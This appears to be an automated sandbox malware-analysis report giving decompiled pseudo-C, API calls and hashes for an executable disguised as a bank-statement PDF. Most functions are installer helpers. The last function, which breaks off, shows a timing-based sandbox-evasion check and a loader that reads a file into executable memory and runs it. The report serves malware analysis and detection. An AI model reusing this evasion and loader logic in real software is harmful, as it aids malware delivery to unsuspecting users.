                                                    • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                    • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                    • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 73%
                                                    			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                    0x00401e4e
                                                    0x00401e59
                                                    0x00401e5b
                                                    0x00401e68
                                                    0x00401e7f
                                                    0x00401e84
                                                    0x00401e91
                                                    0x00401e96
                                                    0x00401e9a
                                                    0x00401ea5
                                                    0x00401eac
                                                    0x00401ebe
                                                    0x00401ec4
                                                    0x00401ec9
                                                    0x00401ed3
                                                    0x00402638
                                                    0x0040156d
                                                    0x00402ba4
                                                    0x00402c2d
                                                    0x00402c39

                                                    APIs
                                                    • GetDC.USER32(?), ref: 00401E51
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                    • ReleaseDC.USER32 ref: 00401E84
                                                      • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                      • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                    • String ID:
                                                    • API String ID: 2584051700-0
                                                    • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                    • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                    • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                    • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                    0x00401c43
                                                    0x00401c45
                                                    0x00401c4c
                                                    0x00401c4f
                                                    0x00401c52
                                                    0x00401c5c
                                                    0x00401c60
                                                    0x00401c63
                                                    0x00401c6c
                                                    0x00401c6c
                                                    0x00401c6f
                                                    0x00401c73
                                                    0x00401c7c
                                                    0x00401c7c
                                                    0x00401c7f
                                                    0x00401c83
                                                    0x00401c85
                                                    0x00401cda
                                                    0x00401cdc
                                                    0x00401ce7
                                                    0x00401cf1
                                                    0x00401cf4
                                                    0x00401cf4
                                                    0x00401cfd
                                                    0x00000000
                                                    0x00401c87
                                                    0x00401c8e
                                                    0x00401c90
                                                    0x00401c93
                                                    0x00401c99
                                                    0x00401ca0
                                                    0x00401ca3
                                                    0x00401ccb
                                                    0x00401d03
                                                    0x00401d03
                                                    0x00401ca5
                                                    0x00401cb3
                                                    0x00401cbb
                                                    0x00401cbe
                                                    0x00401cbe
                                                    0x00401ca3
                                                    0x00401d06
                                                    0x00401d09
                                                    0x00401d0f
                                                    0x00402ba4
                                                    0x00402ba4
                                                    0x00402c2d
                                                    0x00402c39

                                                    APIs
                                                    • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Timeout
                                                    • String ID: !
                                                    • API String ID: 1777923405-2657877971
                                                    • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                    • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                    • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                    • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                    0x00406544
                                                    0x00406546
                                                    0x0040655b
                                                    0x0040655e
                                                    0x00406563
                                                    0x00406568
                                                    0x004065a6
                                                    0x004065a6
                                                    0x0040656a
                                                    0x0040657c
                                                    0x00406587
                                                    0x0040658d
                                                    0x00406598
                                                    0x00000000
                                                    0x00000000
                                                    0x00406598
                                                    0x004065ac

                                                    APIs
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,?,?,0040679D,80000002), ref: 0040657C
                                                    • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,"C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,"C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,00000000,00422728), ref: 00406587
                                                    Strings
                                                    • "C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj, xrefs: 0040653D
                                                    • ('B, xrefs: 0040655B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue
                                                    • String ID: "C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj$('B
                                                    • API String ID: 3356406503-3832942332
                                                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                    • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                    • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                    0x00405f38
                                                    0x00405f45
                                                    0x00405f46
                                                    0x00405f51
                                                    0x00405f59
                                                    0x00405f59
                                                    0x00405f61

                                                    APIs
                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: CharPrevlstrcatlstrlen
                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                    • API String ID: 2659869361-823278215
                                                    • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                    • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                    • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                    • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                                                    0x00405642
                                                    0x0040564c
                                                    0x00405668
                                                    0x0040568a
                                                    0x0040568d
                                                    0x00405693
                                                    0x0040569d
                                                    0x0040569e
                                                    0x004056a0
                                                    0x004056a6
                                                    0x004056a6
                                                    0x004056b0
                                                    0x00000000
                                                    0x004056be
                                                    0x00405675
                                                    0x004056ad
                                                    0x004056ad
                                                    0x00000000
                                                    0x004056ad
                                                    0x00405681
                                                    0x00405683
                                                    0x00000000
                                                    0x00405683
                                                    0x00405652
                                                    0x00000000
                                                    0x00000000
                                                    0x00405659
                                                    0x00000000

                                                    APIs
                                                    • IsWindowVisible.USER32 ref: 0040566D
                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                      • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: Window$CallMessageProcSendVisible
                                                    • String ID:
                                                    • API String ID: 3748168415-3916222277
                                                    • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                    • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                    • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                    • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                    0x00405f84
                                                    0x00405f8e
                                                    0x00405f91
                                                    0x00405f97
                                                    0x00405f98
                                                    0x00405f99
                                                    0x00405fa1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405fa1
                                                    0x00405fa3
                                                    0x00405fab

                                                    APIs
                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00405F89
                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00405F99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: CharPrevlstrlen
                                                    • String ID: C:\Users\user\Desktop
                                                    • API String ID: 2709904686-1246513382
                                                    • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                    • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                    • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                    • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                    0x004060cd
                                                    0x004060cf
                                                    0x004060d2
                                                    0x004060fe
                                                    0x004060d7
                                                    0x004060e0
                                                    0x004060e5
                                                    0x004060f0
                                                    0x004060f3
                                                    0x0040610f
                                                    0x004060f5
                                                    0x004060fc
                                                    0x00000000
                                                    0x004060fc
                                                    0x00406108
                                                    0x0040610c
                                                    0x0040610c
                                                    0x00406106
                                                    0x00000000

                                                    APIs
                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                    • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                    • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                    • String ID:
                                                    • API String ID: 190613189-0
                                                    • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                    • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                    • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                    • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Executed Functions

                                                    Function 00401EEB Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 180registrywindowsleepCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 79%
                                                    			E00401EEB(signed long long __fp0, struct HINSTANCE__* _a4, long _a12, int _a16) {
				struct tagMSG _v32;
				struct tagMONITORINFO _v72;
				struct _WNDCLASSEXW _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t36;
				void* _t39;
				long _t41;
				void* _t43;
				struct HINSTANCE__* _t49;
				int _t51;
				struct HMONITOR__* _t56;
				int _t65;
				int _t67;
				int _t69;
				intOrPtr _t74;
				signed int _t83;
				char* _t84;
				int _t87;
				void* _t89;
				struct HACCEL__* _t91;
				signed int _t92;
				void* _t94;
				struct HWND__* _t95;
				signed long long _t105;

				_t105 = __fp0;
				_t36 = GetTickCount();
				Sleep(0x2be); // executed
				if(GetTickCount() - _t36 < 0x2bc) {
					return 0;
				}
				_t39 = E00402CFD(_a12, "rb"); // executed
				_push(2);
				_t89 = _t39;
				_push(0);
				_push(_t89); // executed
				E00402BC5(0, _t89, GetTickCount, __eflags); // executed
				_push(_t89); // executed
				_t41 = E00402AD6(0, _t89, GetTickCount, __eflags); // executed
				_push(0);
				_push(0);
				_push(_t89);
				_a12 = _t41;
				E00402BC5(0, _t89, GetTickCount, __eflags); // executed
				_t43 = VirtualAlloc(0, _a12, 0x3000, 0x40); // executed
				_t94 = _t43;
				E00402925(_t94, _a12, 1, _t89); // executed
				_t83 = 0;
				__eflags = _a12;
				if(_a12 <= 0) {
					L4:
					 *_t94(); // executed
					__imp__#17();
					E00401655(_t86, _t105);
